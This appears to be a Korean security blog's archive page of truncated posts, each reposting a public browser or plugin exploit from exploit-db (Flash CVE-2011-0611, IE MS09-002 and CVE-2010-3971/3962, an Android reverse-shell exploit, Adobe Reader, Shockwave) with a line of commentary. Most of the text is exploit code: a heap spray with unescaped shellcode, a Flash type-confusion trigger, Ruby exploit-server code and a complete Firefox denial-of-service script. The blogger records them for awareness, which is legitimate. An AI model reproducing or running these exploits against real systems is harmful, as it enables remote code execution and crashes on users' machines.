악성코드 유포에 이용될수도 있을거 같아 기록해 둡니다. http://www.exploit-db.com/exploits/17575/ <html> <head> <script> /* Abysssec Public Advisory apple killed one of our 0day no point to keep it private anymore 🙁 there is another version of exploit using POPup and thats more reliable but as you know safari block pop up by default so we found a …
Adobe Flash Player 0-day Exploit (CVE-2011-0611)
CVE-2011-0611 취약점과 관련된 SWF에서 아래와 같인 코드가 확인된다고 한다. Date.prototype.c_fun = SharedObject.prototype.getSize; Date.prototype.getDay = function () { this.c_fun(); }; var eval(0) = new Date(1.41466385537348e-315); (eval(0)).getDay(); Date.prototype.getDay = SharedObject.prototype.getSize; var d = new Date(8.30830068348057E-246); var __callResult_19 = d.getDay();
Windows Common Control Library (Comctl32) Heap Overflow (MS10-081, CVE-2010-2746)
#!/usr/bin/env ruby # http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept # Nephi Johnson require 'socket' def http_send(sock, data, opts={}) defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"} opts = defaults.merge(opts) code = opts[:code] message = opts[:message] type = opts[:type] date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT") headers = "HTTP/1.1 #{code} #{message}\r\n" + "Date: #{date_str}\r\n" + "Content-Length: #{data.length}\r\n" + "Content-Type: #{type}\r\n\r\n" puts "[+] …
Internet Explorer Uninitialized Memory Corruption Vulnerability (MS09-002, CVE-2009-0075)
<SCRIPT LANGUAGE="JavaScript"> <!– Hide function killErrors() { return true; } window.onerror = killErrors; // –> </SCRIPT> <script language="JavaScript"> var aaa4='생략'; var aa4=(aaa4.replace(/MV/g,"%u")); var shellcode=unescape(aa4); var array = new Array(); var calc = 0x100000-(shellcode.length*2+0x01020); var point = unescape("%u0D0D%u0D0D"); while(point.length<calc) { point+=point;} var sec = point.substring(0,calc/2); delete point; for(i=0; i<0xD0; i++) { array[i] = sec + shellcode; …
Internet Explorer 8 CSS Parser Exploit – (CVE-2010-3971, MS11-003)
인터넷 익스플로러 8 버전에 대한 취약점이 나와 기록해 둡니다. http://www.exploit-db.com/exploits/15746/ #!/usr/bin/env ruby # Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ # Author: Nephi Johnson (d0c_s4vage) require 'socket' def http_send(sock, data, opts={}) defaults = {:code=>"200", :message=>"OK", :type=>"text/html"} opts = defaults.merge(opts) code = opts[:code] message = opts[:message] type = opts[:type] to_send = "HTTP/1.1 #{code} #{message}\r\n" + "Date: Sat, 11 Dec 2010 14:20:23 …
Mozilla Firefox <= 3.6.12 Remote Denial Of Service
최근에 Firefox 취약점이 자주 나오네요.. 불안하게 -_- 출처 : http://www.exploit-db.com/exploits/15498/ <!– 0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service Credits: Emanuele 'emgent' Gentili <[email protected]> Marco 'white_sheep' Rondini <[email protected]> Alessandro 'scox' Scoscia <[email protected]> –> <script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script> <script> var i=0; for (i=0;i<=19999;i++) { document.write("a"); } for (i=0;i<=3;i++) { document.write(document.body.innerHTML); } </script>
Adobe Reader 관련 취약점 정리
Adobe 관련 취약점들이 수도없이 쏟아져 나왔으며 계속해서 나오고 있다. 정리가 필요할 거 같아 정리해둔다. 빠진건 계속해서 업데이트 하고 우선 이것들만…… 이후엔 Sandbox 형태로 바뀔거라고 하던데 과연? util.printf – CVE-2008-2992 Adobe Reader Javascript Printf Buffer Overflow Exploit =========================================================== Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow CVE-2008-2992 Thanks to coresecurity for the technical background. 6Nov,2008: Exploit released by me Credits: Debasis Mohanty …
Android 2.0-2.1 Reverse Shell Exploit – CVE-2010-1807
안드로이드에서 원격에서 실행가능한 취약점이 확인되었네요.. 기록용으로 남겨 둡니다. 출처 : http://www.exploit-db.com/exploits/15423/, http://www.exploit-db.com/exploits/15548/ <html> <head> <script> // bug = webkit code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807 // listed as a safari bug but also works on android 🙂 //tested = moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 – 2.1 //patched= android 2.2 //author = mj …
Internet Explorer Memory Corruption 0day Vulnerability – CVE-2010-3962, MS10-090
익스플로러 취약점이 또 나왔네요. 악성코드 유포에 이용될 수 있기에 기록해 둡니다. 출처 : http://www.exploit-db.com/exploits/15421/ # Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962 # Tested on Windows XP SP3 IE6 IE7 IE8 # Coded by Matteo Memelli ryujin __at__ offsec.com # http://www.offensive-security.com/0day/ie-0day.txt # Thx to dookie __at__ offsec.com # notes : This is a quick and …
Adobe Shockwave Director tSAC Chunk Memory Corruption
악성코드 유포에 이용되고 있어 기록해 둡니다…지겨운 ARP Spoooooooooooooofing 🙁 출처 : http://www.exploit-db.com/exploits/15076/ ''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | …